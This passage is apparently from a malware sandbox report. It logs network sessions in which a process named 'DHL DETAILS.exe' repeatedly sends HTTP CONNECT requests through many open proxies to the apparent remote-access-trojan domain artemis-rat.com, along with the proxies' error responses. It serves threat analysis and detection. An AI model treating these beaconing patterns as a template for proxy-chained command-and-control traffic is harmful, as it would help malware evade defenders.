Mar 9, 2024 13:14:15.372963905 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:15 GMT Server: Apache Content-Length: 534 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 68 65 6c 70 40 67 65 6e 69 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at help@geninetworks.com to inform them of the time this

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
411	192.168.2.5	51226	160.16.90.35	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.628861904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.301820040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.690685987 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
412	192.168.2.5	51281	51.20.50.149	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.639390945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.962296009 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
413	192.168.2.5	51242	185.219.133.106	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.646337986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.026469946 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
414	192.168.2.5	51364	104.25.135.170	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.649225950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.803910017 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
415	192.168.2.5	51293	173.249.29.243	9123	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.675312042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.987941980 CET	536	IN	HTTP/1.1 503 Service Unavailable Server: squid/3.5.27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3832 X-Squid-Error: ERR_DNS_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
416	192.168.2.5	50130	167.86.69.142	42214	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.677769899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.676991940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.677496910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.677100897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677826881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
417	192.168.2.5	51198	90.188.250.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.678859949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
418	192.168.2.5	51305	95.164.89.123	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.691836119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.993149996 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
419	192.168.2.5	50162	185.217.136.67	1337	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.692189932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.723846912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724391937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.833190918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.834142923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
420	192.168.2.5	51113	117.160.250.163	81	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.692282915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.234915972 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:14 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
421	192.168.2.5	50280	162.241.46.40	64353	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.705023050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.723880053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724389076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.833209038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.834142923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
422	192.168.2.5	51323	60.246.122.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.713505983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
423	192.168.2.5	51355	184.170.245.148	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.713689089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
424	192.168.2.5	50189	178.128.207.96	18877	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.714865923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781192064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.915770054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.974036932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.974257946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
425	192.168.2.5	51276	89.218.8.152	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.722755909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
426	192.168.2.5	50268	52.151.210.204	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.727560043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
427	192.168.2.5	50156	154.236.189.7	1976	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.730643034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.723865986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724390030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.833208084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.834141016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
428	192.168.2.5	51248	60.12.168.114	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.736239910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.169042110 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:52:47 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
429	192.168.2.5	51287	103.83.232.122	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.738615036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.115124941 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
430	192.168.2.5	51327	213.136.78.200	28513	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.739238024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.442476034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.458122015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536870956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.630681992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
431	192.168.2.5	51319	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
